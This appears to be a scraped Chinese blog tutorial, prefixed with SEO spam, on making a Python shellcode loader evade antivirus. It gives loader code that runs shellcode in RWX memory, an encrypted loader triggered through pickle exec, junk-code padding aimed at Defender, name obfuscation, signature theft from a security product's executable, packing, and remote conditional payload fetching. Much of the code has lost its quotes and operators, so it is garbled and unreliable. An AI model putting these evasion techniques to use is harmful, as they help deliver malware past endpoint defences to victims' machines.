网站模版 下载工具,网站的费用,wordpress后台页地址修改,网站制作方法文章目录 loader基础知识loader参数介绍 evilhiding项目地址免杀方式修改加载器花指令混淆loader源码修改签名加壳远程条件触发修改ico的md5加密 loader基础知识
loader
import ctypes
##xff08;kali生成payload存放位置#xff09;
shellcode bytearray(bshellc… 文章目录 loader基础知识loader参数介绍 evilhiding项目地址免杀方式修改加载器花指令混淆loader源码修改签名加壳远程条件触发修改ico的md5加密 loader基础知识
loader
import ctypes
#kali生成payload存放位置
shellcode bytearray(bshellcode)
# 设置VirtualAlloc返回类型为ctypes.c_uint64
ctypes.windll.kernel32.VirtualAlloc.restype ctypes.c_uint64
# 申请内存
ptr ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0), ctypes.c_int(len(shellcode)), ctypes.c_int(0x3000), ctypes.c_int(0x40))# 放入shellcode
buf (ctypes.c_char * len(shellcode)).from_buffer(shellcode)
ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_uint64(ptr), buf, ctypes.c_int(len(shellcode))
)
# 创建一个线程从shellcode防止位置首地址开始执行
handle ctypes.windll.kernel32.CreateThread(ctypes.c_int(0), ctypes.c_int(0), ctypes.c_uint64(ptr), ctypes.c_int(0), ctypes.c_int(0), ctypes.pointer(ctypes.c_int(0))
)
# 等待上面创建的线程运行完
ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(handle),ctypes.c_int(-1))参数介绍
# virtualalloc 申请虚拟内存
LPVOID VirtualAlloc(
LPVOID lpAddress, // 指定要分配的区域的期望起始地址。一般为null
SIZE_T dwSize, // 要分配的堆栈大小
DWORD flAllocationType, // 类型的分配
DWORD flProtect // 内存的执行权限
);
// 属性解释
flAllocationType
MEM_COMMIT 在内存或磁盘上的分页文件中为指定的内存页区域分配物理存储。该函数将内存初始化为零。(提交到物理内存)
MEM_REVERSE: 保留一定范围的进程虚拟地址空间而不在内存或磁盘上的分页文件中分配任何实际物理存储。保留虚拟内存flProtect
PAGE_EXECUTE_READWRITE 内存页分配为可读可写可执行
PAGE_READWRITE 内存页分配为可读可写#RtlMoveMemory: 将一个缓冲区的内容复制到另一个缓冲区。
VOID RtlMoveMemory(
IN VOID UNALIGNED *Destination, // 要复制到的目标
IN CONST VOID UNALIGNED *Source, // 要转移的内存块
IN SIZE_T Length // 内存块大小
);# CreateThread: 创建线程
HANDLE CreateThread(
LPSECURITY_ATTRIBUTES lpThreadAttributes, // 安全属性一般设置为0或者null
SIZE_T dwStackSize, // 初始栈大小 设置为0
LPTHREAD_START_ROUTINE lpStartAddress, // 线程函数地址
LPVOID lpParameter, // 线程参数没传参即为0
DWORD dwCreationFlags, // 创建线程标志对线程做控制的
LPDWORD lpThreadId // 线程id
);# WaitForSingleObject: 等待线程执行完毕
DWORD WaitForSingleObject(
HANDLE hHandle, // 句柄
DWORD dwMilliseconds // 等待标志 常用INFINITE 即为无限等待线程执行完毕
);生成exe
pyinstaller -F -w a.py果然烂大街的代码生成的exe连静态都过不了
evilhiding项目地址
https://github.com/coleak2021/evilhiding.git不能免杀了可以提Issuesstars是持续更新的动力嘻嘻嘻。 免杀方式
修改加载器
import pickle,base64,requests,ctypes
from cryptography.fernet import Ferneturl
def doit(sectr):KEY{key2}fernet Fernet(KEY)destr fernet.decrypt(sectr).decode()class A(object):def __reduce__(self):return (exec, (destr,))ret pickle.dumps(A())ret_base64 base64.b64encode(ret)ret_decode base64.b64decode(ret_base64)pickle.loads(ret_decode)import ctypes
from cryptography.fernet import Fernet
KEY{key}
fernetFernet(KEY)
shellcodefernet.decrypt({enstr})shellcode bytearray(shellcode)
ctypes.windll.kernel32.VirtualAlloc.restype ctypes.c_uint64
ptr ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0), ctypes.c_int(len(shellcode)), ctypes.c_int(0x3000), ctypes.c_int(0x40))
buf (ctypes.c_char * len(shellcode)).from_buffer(shellcode)
ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_uint64(ptr),buf,ctypes.c_int(len(shellcode))
)
handle ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_uint64(ptr),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0))
)
ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(handle),ctypes.c_int(-1))花指令
t1
import randomdef partition(test_arr, low, high):i (low - 1) pivot test_arr[high]for j in range(low, high):if test_arr[j] pivot:i i 1test_arr[i], test_arr[j] test_arr[j], test_arr[i]test_arr[i 1], test_arr[high] test_arr[high], test_arr[i 1]return i 1def quick_sort(test_arr, low, high):if low high:pi partition(test_arr, low, high)quick_sort(test_arr, low, pi - 1)quick_sort(test_arr, pi 1, high)test_arr []
for i in range(59999):test_arr.append(random.random())
n len(test_arr)
quick_sort(test_arr,0, n - 1)
t2
import rere.search(www,www.runoob.com).span()
re.search(com,www.runoob.com).span()line Cats are smarter than dogs ok in shakdhaksdas;searchObj re.search(r(.*) are (.*?) .*, line, re.M | re.I)def double(matched):value int(matched.group(value))return str(value * 2)s A23G4HFD567
re.sub((?Pvalue\d),double, s)t3
import base64st wo gan jue wo ma shang jiu yao bei defender gan diao a ba a bachonogchong chongcong!.encode()
res base64.b64encode(st)
aaa res.decode()
res base64.b64decode(res)
bbb res.decode()
exec(t1)
exec(t2)
exec(t3)混淆loader源码
pyarmor gen a.py
hunxiao函数
def hunxiao():openfile b.pytext open(openfile, encodingutf-8).read()wd_df re.findall(def (.*?)\\(, text)wd_df list(set(wd_df))for i in wd_df:if i[0:2] __:wd_df.remove(i)if i super:wd_df.remove(i)idlist []for i in wd_df:idlist.append(O str(hash(i))[-7:])cs len(wd_df)if cs len(set(idlist)):while cs 0:cs - 1text text.replace(wd_df[cs] (, idlist[cs] ()text text.replace(target wd_df[cs], target idlist[cs])text text.replace(global wd_df[cs], global idlist[cs])text text.replace(, wd_df[cs], , idlist[cs])print(successful function:, wd_df, \n, idlist)else:print(hash repeat)file_save open(b.py, w, encodingutf-8)file_save.write(text)file_save.close()修改签名
python sigthief.py -i D:\Huorong\Sysdiag\bin\HipsMain.exe -t HipsMain1.exe -o HipsMain.exe加壳
vmpro
远程条件触发
def start():try:rrequests.get(url)a r.status_codeexcept:a 404passif a 200:doit(r.text)else:修改ico的md5
iconamef{int (time.time() *1000)}.ico
with open(coleak.ico,br) as f:contf.read()
with open(f{iconame},bw) as f:conticoname.encode()f.write(cont)os.remove(iconame)加密
key Fernet.generate_key()
fernet Fernet(key)
enstr fernet.encrypt(shellcode)key2 Fernet.generate_key()
fernet2 Fernet(key2)with open(a.txt, bw) as f:f.write(fernet2.encrypt(a.encode()))
